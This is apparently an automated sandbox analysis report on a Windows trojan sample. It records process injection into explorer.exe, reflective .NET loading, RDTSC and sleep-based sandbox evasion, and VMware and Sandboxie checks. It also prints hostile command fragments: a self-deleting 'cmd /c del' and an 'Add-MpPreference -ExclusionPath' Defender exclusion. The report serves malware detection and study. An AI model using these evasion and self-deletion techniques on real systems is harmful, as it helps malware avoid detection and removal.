            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052595F0 NtQueryInformationFile,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259730 NtQueryVirtualMemory,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0525A710 NtOpenProcessToken,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259760 NtOpenProcess,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0525A770 NtOpenThread,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259770 NtSetInformationFile,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052597A0 NtUnmapViewOfSection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259610 NtEnumerateValueKey,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259670 NtQueryInformationProcess,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259950 NtQueueApcThread,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052599D0 NtCreateProcessEx,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259820 NtEnumerateKey,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0525B040 NtSuspendThread,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052598A0 NtWriteVirtualMemory,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_052598F0 NtReadVirtualMemory,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259B00 NtSetValueKey,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0525A3B0 NtGetContextThread,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259A20 NtResumeThread,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259A00 NtProtectVirtualMemory,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259A10 NtQuerySection,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_05259A80 NtOpenDirectoryObject,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F98680 NtReadFile,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F987B0 NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F98700 NtClose,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F985D0 NtCreateFile,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9882A NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F987AA NtAllocateVirtualMemory,
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9872A NtReadFile,
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.307080980.0000000008400000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.304067071.0000000004319000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000000.239279305.0000000000FC6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameASCIIEncodi.exe4 vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.306944655.0000000008160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.303068640.00000000033C9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302842278.000000000336C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameASCIIEncodi.exe4 vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302842278.000000000336C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302842278.000000000336C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000000.298589322.0000000000AE6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameASCIIEncodi.exe4 vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374857258.00000000017DF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.376107685.00000000036CE000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374555186.000000000164F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs tlBHrCrteFXy8Jz.exe
            Source: tlBHrCrteFXy8Jz.exeBinary or memory string: OriginalFilenameASCIIEncodi.exe4 vs tlBHrCrteFXy8Jz.exe
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeFile read: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe:Zone.IdentifierJump to behavior
            Source: tlBHrCrteFXy8Jz.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess created: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess created: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tlBHrCrteFXy8Jz.exe.logJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/4
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4684:120:WilError_01
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
            Source: tlBHrCrteFXy8Jz.exe, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: tlBHrCrteFXy8Jz.exe, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.2.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.2.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.0.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.0.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.2.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.2.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.3.unpack, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.3.unpack, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.7.unpack, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.7.unpack, zz/no.csCryptographic APIs: 'CreateDecryptor'
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: tlBHrCrteFXy8Jz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: tlBHrCrteFXy8Jz.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: tlBHrCrteFXy8Jz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: explorer.pdbUGP source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: ASCIIEncodi.pdb source: tlBHrCrteFXy8Jz.exe
            Source: Binary string: wntdll.pdbUGP source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374179231.0000000001530000.00000040.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374555186.000000000164F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.512009666.000000000530F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.510583143.00000000051F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374179231.0000000001530000.00000040.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 0000000B.00000002.374555186.000000000164F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000010.00000002.512009666.000000000530F000.00000040.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.510583143.00000000051F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: explorer.pdb source: tlBHrCrteFXy8Jz.exe, 0000000B.00000002.375162074.0000000003380000.00000040.10000000.00040000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: tlBHrCrteFXy8Jz.exe, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 11.2.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.3.unpack, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.7.unpack, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.9.unpack, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.0.unpack, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.5.unpack, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.2.unpack, ar/VN.cs.Net Code: nQZ System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: tlBHrCrteFXy8Jz.exe, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 0.2.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 0.0.tlBHrCrteFXy8Jz.exe.f00000.0.unpack, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 11.2.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.3.unpack, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.7.unpack, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.9.unpack, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.1.unpack, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.0.unpack, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.5.unpack, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: 11.0.tlBHrCrteFXy8Jz.exe.a20000.2.unpack, zz/no.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 0_2_08574EC4 push eax; ret
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041B87C push eax; ret
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041B812 push eax; ret
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041B81B push eax; ret
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041C88D push edx; iretd
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_004151A6 push CCBB5791h; iretd
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_00415C48 push esp; retf
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0040753A push eax; retf
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_0041B7C5 push eax; ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_0526D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9C88D push edx; iretd
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9B87C push eax; ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9B81B push eax; ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9B812 push eax; ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F951A6 push CCBB5791h; iretd
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9B7C5 push eax; ret
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F95C48 push esp; retf
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F9C560 pushfd ; iretd
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_02F8753A push eax; retf

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
            Source: C:\Windows\SysWOW64\explorer.exeProcess created: /c del "C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe"
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: Yara matchFile source: 0.2.tlBHrCrteFXy8Jz.exe.335d944.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.tlBHrCrteFXy8Jz.exe.33dd334.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.303068640.00000000033C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: tlBHrCrteFXy8Jz.exe PID: 6248, type: MEMORYSTR
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.303068640.00000000033C9000.00000004.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.303068640.00000000033C9000.00000004.00000800.00020000.00000000.sdmp, tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000002F88604 second address: 0000000002F8860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 0000000002F8898E second address: 0000000002F88994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe TID: 6252Thread sleep time: -34409s >= -30000s
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exe TID: 6284Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeCode function: 11_2_004088C0 rdtsc
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 8.3 %
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeThread delayed: delay time: 34409
            Source: C:\Users\user\Desktop\tlBHrCrteFXy8Jz.exeThread delayed: delay time: 922337203685477
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
            Source: explorer.exe, 0000000D.00000000.335963239.0000000008C73000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 30d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000D.00000000.320225868.0000000008A32000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 0000000D.00000000.320225868.0000000008A32000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 0000000D.00000000.322692727.000000000EDF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Byf
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 0000000D.00000000.354025996.0000000008B4E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: tlBHrCrteFXy8Jz.exe, 00000000.00000002.302694736.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: explorer.exe, 0000000D.00000000.322692727.000000000EDF0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}xy
            Source: explorer.exe, 0000000D.00000000.354025996.0000000008B4E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
            Source: explorer.exe, 0000000D.00000000.344872504.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
